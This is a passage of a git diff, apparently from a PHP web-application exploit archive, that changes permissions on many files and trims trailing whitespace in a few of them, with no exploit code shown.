b/platforms/php/webapps/41304.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41305.txt b/platforms/php/webapps/41305.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41306.txt b/platforms/php/webapps/41306.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41307.txt b/platforms/php/webapps/41307.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41308.txt b/platforms/php/webapps/41308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4131.txt b/platforms/php/webapps/4131.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41313.txt b/platforms/php/webapps/41313.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41314.txt b/platforms/php/webapps/41314.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41315.txt b/platforms/php/webapps/41315.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41316.txt b/platforms/php/webapps/41316.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41317.txt b/platforms/php/webapps/41317.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41318.txt b/platforms/php/webapps/41318.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41319.txt b/platforms/php/webapps/41319.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4132.txt b/platforms/php/webapps/4132.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41322.txt b/platforms/php/webapps/41322.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41323.txt b/platforms/php/webapps/41323.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41324.txt b/platforms/php/webapps/41324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41325.txt b/platforms/php/webapps/41325.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41326.txt b/platforms/php/webapps/41326.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41327.txt b/platforms/php/webapps/41327.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41328.txt b/platforms/php/webapps/41328.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41329.txt b/platforms/php/webapps/41329.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4133.txt b/platforms/php/webapps/4133.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41330.txt b/platforms/php/webapps/41330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41331.txt b/platforms/php/webapps/41331.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41332.txt b/platforms/php/webapps/41332.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41333.txt b/platforms/php/webapps/41333.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41334.txt b/platforms/php/webapps/41334.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41335.txt b/platforms/php/webapps/41335.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41336.txt b/platforms/php/webapps/41336.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41337.txt b/platforms/php/webapps/41337.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41338.txt b/platforms/php/webapps/41338.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41339.txt b/platforms/php/webapps/41339.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4134.txt b/platforms/php/webapps/4134.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41340.txt b/platforms/php/webapps/41340.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41341.txt b/platforms/php/webapps/41341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41342.txt b/platforms/php/webapps/41342.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41343.txt b/platforms/php/webapps/41343.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41344.txt b/platforms/php/webapps/41344.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41345.txt b/platforms/php/webapps/41345.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41346.txt b/platforms/php/webapps/41346.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41347.txt b/platforms/php/webapps/41347.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41359.txt b/platforms/php/webapps/41359.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4136.txt b/platforms/php/webapps/4136.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41362.txt b/platforms/php/webapps/41362.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41368.txt b/platforms/php/webapps/41368.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41371.txt b/platforms/php/webapps/41371.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41372.txt b/platforms/php/webapps/41372.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41373.txt b/platforms/php/webapps/41373.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41374.txt b/platforms/php/webapps/41374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41376.txt b/platforms/php/webapps/41376.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41378.txt b/platforms/php/webapps/41378.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41379.txt b/platforms/php/webapps/41379.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4138.txt b/platforms/php/webapps/4138.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41380.txt b/platforms/php/webapps/41380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41382.txt b/platforms/php/webapps/41382.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41383.txt b/platforms/php/webapps/41383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41384.txt b/platforms/php/webapps/41384.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41385.txt b/platforms/php/webapps/41385.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41386.txt b/platforms/php/webapps/41386.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41387.txt b/platforms/php/webapps/41387.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41388.txt b/platforms/php/webapps/41388.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41389.txt b/platforms/php/webapps/41389.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4139.txt b/platforms/php/webapps/4139.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41390.txt b/platforms/php/webapps/41390.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41391.txt b/platforms/php/webapps/41391.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41392.html b/platforms/php/webapps/41392.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41393.txt b/platforms/php/webapps/41393.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41396.txt b/platforms/php/webapps/41396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41399.txt b/platforms/php/webapps/41399.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4140.txt b/platforms/php/webapps/4140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41400.txt b/platforms/php/webapps/41400.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41405.txt b/platforms/php/webapps/41405.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41406.txt b/platforms/php/webapps/41406.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41407.txt b/platforms/php/webapps/41407.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41408.txt b/platforms/php/webapps/41408.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41409.txt b/platforms/php/webapps/41409.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4141.txt b/platforms/php/webapps/4141.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41410.txt b/platforms/php/webapps/41410.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41411.txt b/platforms/php/webapps/41411.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41412.txt b/platforms/php/webapps/41412.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4142.txt b/platforms/php/webapps/4142.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41427.txt b/platforms/php/webapps/41427.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41428.txt b/platforms/php/webapps/41428.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41429.txt b/platforms/php/webapps/41429.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41430.txt b/platforms/php/webapps/41430.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41431.txt b/platforms/php/webapps/41431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41433.txt b/platforms/php/webapps/41433.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41438.txt b/platforms/php/webapps/41438.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4144.php b/platforms/php/webapps/4144.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41440.txt b/platforms/php/webapps/41440.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41441.txt b/platforms/php/webapps/41441.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41442.txt b/platforms/php/webapps/41442.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41444.txt b/platforms/php/webapps/41444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41445.txt b/platforms/php/webapps/41445.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41446.txt b/platforms/php/webapps/41446.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41447.txt b/platforms/php/webapps/41447.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41448.txt b/platforms/php/webapps/41448.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4145.php b/platforms/php/webapps/4145.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41450.txt b/platforms/php/webapps/41450.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41452.txt b/platforms/php/webapps/41452.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41455.txt b/platforms/php/webapps/41455.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41456.txt b/platforms/php/webapps/41456.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41460.txt b/platforms/php/webapps/41460.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41462.txt b/platforms/php/webapps/41462.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41463.txt b/platforms/php/webapps/41463.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41464.txt b/platforms/php/webapps/41464.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41465.txt b/platforms/php/webapps/41465.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4147.php b/platforms/php/webapps/4147.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41470.txt b/platforms/php/webapps/41470.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41483.html b/platforms/php/webapps/41483.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41484.txt b/platforms/php/webapps/41484.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41485.html b/platforms/php/webapps/41485.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41486.txt b/platforms/php/webapps/41486.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41487.html b/platforms/php/webapps/41487.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41488.html b/platforms/php/webapps/41488.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41489.txt b/platforms/php/webapps/41489.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41490.txt b/platforms/php/webapps/41490.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41491.txt b/platforms/php/webapps/41491.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41492.txt b/platforms/php/webapps/41492.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41493.txt b/platforms/php/webapps/41493.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41494.txt b/platforms/php/webapps/41494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41495.txt b/platforms/php/webapps/41495.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41496.txt b/platforms/php/webapps/41496.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41497.php b/platforms/php/webapps/41497.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4150.txt b/platforms/php/webapps/4150.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41500.txt b/platforms/php/webapps/41500.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41501.txt b/platforms/php/webapps/41501.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41504.txt b/platforms/php/webapps/41504.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41505.txt b/platforms/php/webapps/41505.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41506.txt b/platforms/php/webapps/41506.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41507.txt b/platforms/php/webapps/41507.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41508.txt b/platforms/php/webapps/41508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41512.txt b/platforms/php/webapps/41512.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41513.txt b/platforms/php/webapps/41513.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41514.txt b/platforms/php/webapps/41514.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41515.txt b/platforms/php/webapps/41515.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41516.txt b/platforms/php/webapps/41516.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41517.txt b/platforms/php/webapps/41517.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41518.txt b/platforms/php/webapps/41518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41519.txt b/platforms/php/webapps/41519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41520.txt b/platforms/php/webapps/41520.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41521.txt b/platforms/php/webapps/41521.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41522.txt b/platforms/php/webapps/41522.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41523.txt b/platforms/php/webapps/41523.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41524.txt b/platforms/php/webapps/41524.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41525.txt b/platforms/php/webapps/41525.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41526.txt b/platforms/php/webapps/41526.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41527.txt b/platforms/php/webapps/41527.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41528.txt b/platforms/php/webapps/41528.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41529.txt b/platforms/php/webapps/41529.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4153.txt b/platforms/php/webapps/4153.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41530.txt b/platforms/php/webapps/41530.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41531.txt b/platforms/php/webapps/41531.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41532.txt b/platforms/php/webapps/41532.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41533.txt b/platforms/php/webapps/41533.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41534.txt b/platforms/php/webapps/41534.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41535.txt b/platforms/php/webapps/41535.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41536.txt b/platforms/php/webapps/41536.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41539.txt b/platforms/php/webapps/41539.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4154.txt b/platforms/php/webapps/4154.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41543.txt b/platforms/php/webapps/41543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41544.txt b/platforms/php/webapps/41544.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41548.txt b/platforms/php/webapps/41548.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41549.txt b/platforms/php/webapps/41549.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41550.txt b/platforms/php/webapps/41550.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41551.txt b/platforms/php/webapps/41551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41552.txt b/platforms/php/webapps/41552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41553.txt b/platforms/php/webapps/41553.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41556.txt b/platforms/php/webapps/41556.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41557.txt b/platforms/php/webapps/41557.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41558.txt b/platforms/php/webapps/41558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41559.txt b/platforms/php/webapps/41559.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4156.txt b/platforms/php/webapps/4156.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41560.txt b/platforms/php/webapps/41560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41561.txt b/platforms/php/webapps/41561.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41562.txt b/platforms/php/webapps/41562.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41563.txt b/platforms/php/webapps/41563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41564.php b/platforms/php/webapps/41564.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41566.txt b/platforms/php/webapps/41566.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41567.txt b/platforms/php/webapps/41567.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41568.txt b/platforms/php/webapps/41568.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41569.txt b/platforms/php/webapps/41569.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41580.pl b/platforms/php/webapps/41580.pl index b4899c1eb..b11b663c4 100755 --- a/platforms/php/webapps/41580.pl +++ b/platforms/php/webapps/41580.pl @@ -257,9 +257,4 @@ sub usage() { "[*---------------------------------------------------------*]\n"; exit; -} - - - - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/php/webapps/41582.txt b/platforms/php/webapps/41582.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41583.txt b/platforms/php/webapps/41583.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41584.txt b/platforms/php/webapps/41584.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41585.txt b/platforms/php/webapps/41585.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41586.txt b/platforms/php/webapps/41586.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41587.txt b/platforms/php/webapps/41587.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41588.txt b/platforms/php/webapps/41588.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41589.txt b/platforms/php/webapps/41589.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4159.txt b/platforms/php/webapps/4159.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41590.txt b/platforms/php/webapps/41590.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41591.txt b/platforms/php/webapps/41591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41593.txt b/platforms/php/webapps/41593.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41594.txt b/platforms/php/webapps/41594.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41595.txt b/platforms/php/webapps/41595.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41599.txt b/platforms/php/webapps/41599.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41600.txt b/platforms/php/webapps/41600.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41602.txt b/platforms/php/webapps/41602.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41603.txt b/platforms/php/webapps/41603.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41604.txt b/platforms/php/webapps/41604.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4161.txt b/platforms/php/webapps/4161.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41617.txt b/platforms/php/webapps/41617.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41627.txt b/platforms/php/webapps/41627.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4163.php b/platforms/php/webapps/4163.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41632.txt b/platforms/php/webapps/41632.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41634.txt b/platforms/php/webapps/41634.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41636.txt b/platforms/php/webapps/41636.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4164.txt b/platforms/php/webapps/4164.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41641.txt b/platforms/php/webapps/41641.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41642.txt b/platforms/php/webapps/41642.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41644.txt b/platforms/php/webapps/41644.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4166.txt b/platforms/php/webapps/4166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41663.txt b/platforms/php/webapps/41663.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41665.txt b/platforms/php/webapps/41665.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4167.txt b/platforms/php/webapps/4167.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41673.txt b/platforms/php/webapps/41673.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41674.txt b/platforms/php/webapps/41674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4169.txt b/platforms/php/webapps/4169.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41716.txt b/platforms/php/webapps/41716.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41717.txt b/platforms/php/webapps/41717.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41724.txt b/platforms/php/webapps/41724.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41725.txt b/platforms/php/webapps/41725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41726.txt b/platforms/php/webapps/41726.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41727.txt b/platforms/php/webapps/41727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41728.txt b/platforms/php/webapps/41728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41729.txt b/platforms/php/webapps/41729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4173.txt b/platforms/php/webapps/4173.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41730.txt b/platforms/php/webapps/41730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41731.txt b/platforms/php/webapps/41731.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41732.txt b/platforms/php/webapps/41732.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41733.txt b/platforms/php/webapps/41733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41735.txt b/platforms/php/webapps/41735.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41736.txt b/platforms/php/webapps/41736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4174.txt b/platforms/php/webapps/4174.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41746.txt b/platforms/php/webapps/41746.txt old mode 100755 new mode 100644 index 33305c038..ef6c6a2f8 --- a/platforms/php/webapps/41746.txt +++ b/platforms/php/webapps/41746.txt @@ -129,4 +129,4 @@ Update to version 5.1 -- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * -Twitter: @sysdream \ No newline at end of file +Twitter: @sysdream \ No newline at end of file diff --git a/platforms/php/webapps/41747.txt b/platforms/php/webapps/41747.txt old mode 100755 new mode 100644 index 8e1c145d5..06d6ff024 --- a/platforms/php/webapps/41747.txt +++ b/platforms/php/webapps/41747.txt @@ -169,4 +169,4 @@ Update to version 5.1. -- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ -* Twitter: @sysdream \ No newline at end of file +* Twitter: @sysdream \ No newline at end of file diff --git a/platforms/php/webapps/41749.txt b/platforms/php/webapps/41749.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41758.txt b/platforms/php/webapps/41758.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41780.txt b/platforms/php/webapps/41780.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41784.txt b/platforms/php/webapps/41784.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41787.txt b/platforms/php/webapps/41787.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41788.txt b/platforms/php/webapps/41788.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41789.txt b/platforms/php/webapps/41789.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4179.php b/platforms/php/webapps/4179.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4180.txt b/platforms/php/webapps/4180.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41816.txt b/platforms/php/webapps/41816.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41817.txt b/platforms/php/webapps/41817.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41818.txt b/platforms/php/webapps/41818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41819.txt b/platforms/php/webapps/41819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4182.txt b/platforms/php/webapps/4182.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41820.txt b/platforms/php/webapps/41820.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41822.txt b/platforms/php/webapps/41822.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41824.txt b/platforms/php/webapps/41824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41828.php b/platforms/php/webapps/41828.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4183.txt b/platforms/php/webapps/4183.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41830.txt b/platforms/php/webapps/41830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41831.txt b/platforms/php/webapps/41831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41832.txt b/platforms/php/webapps/41832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41833.txt b/platforms/php/webapps/41833.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41834.txt b/platforms/php/webapps/41834.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41835.txt b/platforms/php/webapps/41835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41836.txt b/platforms/php/webapps/41836.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41837.txt b/platforms/php/webapps/41837.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41838.txt b/platforms/php/webapps/41838.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41839.txt b/platforms/php/webapps/41839.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4184.txt b/platforms/php/webapps/4184.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41841.html b/platforms/php/webapps/41841.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41844.html b/platforms/php/webapps/41844.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41845.txt b/platforms/php/webapps/41845.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41846.html b/platforms/php/webapps/41846.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41849.txt b/platforms/php/webapps/41849.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4185.txt b/platforms/php/webapps/4185.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41856.txt b/platforms/php/webapps/41856.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41857.txt b/platforms/php/webapps/41857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41858.txt b/platforms/php/webapps/41858.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41859.txt b/platforms/php/webapps/41859.txt old mode 100755 new mode 100644 diff --git 